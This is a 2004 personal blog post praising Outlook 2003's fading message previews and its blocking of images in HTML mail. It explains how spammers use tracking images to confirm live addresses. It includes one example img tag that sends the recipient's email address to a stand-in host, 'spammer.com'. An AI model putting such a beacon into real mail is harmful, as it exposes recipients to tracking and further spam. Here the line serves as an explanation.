I'll be posting here until I either pay for another year of Radio Userland hosting or figure out how to upstream to somewhere else
Monday, March 15, 2004
Matt and commenters were recently talking about the new features of MS Outlook 2003. I just got the upgrade at work. I agree with Matt that the best new feature is the translucent fading in of the first few lines of new messages. This way you don't need to context-switch in order to decide whether an incoming message needs your attention.
Today I noticed another great feature. Outlook does not automatically load images in HTML mail, but can do so with the click of a button.
With previous versions of Outlook, I installed a special plugin to block render HTML messages in plain text mode. One of the reasons is that if you allow your mail reader to automatically load images, it allows spammers to confirm that an email account is active. Here's how it works: Say a spammer has a database of a million email addresses, some of which are active, and some stale or abandoned. The first time around, he is going to send his penis enlargement spam to all million of them. Each message will contain an html <img> tag pointing at an image on my webserver. But the <img> src will not be static, rather it will have the message recipient's email address embedded in it. For example: <img src="http://spammer.com/enlarge.jpg?sucker=jdcormie@notreal.com"> Next, he configures hiswebserver to serve the same image regardless of the url's "sucker=" suffix. In those cases where the account is active, that is a real person is reading messages on the other end, and that person's email software automatically loads embedded images, their email address will appear in the spammer's webserver access logs. So the next time around, he can remove the dead email addresses from his list, and only target confirmed live addresses.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment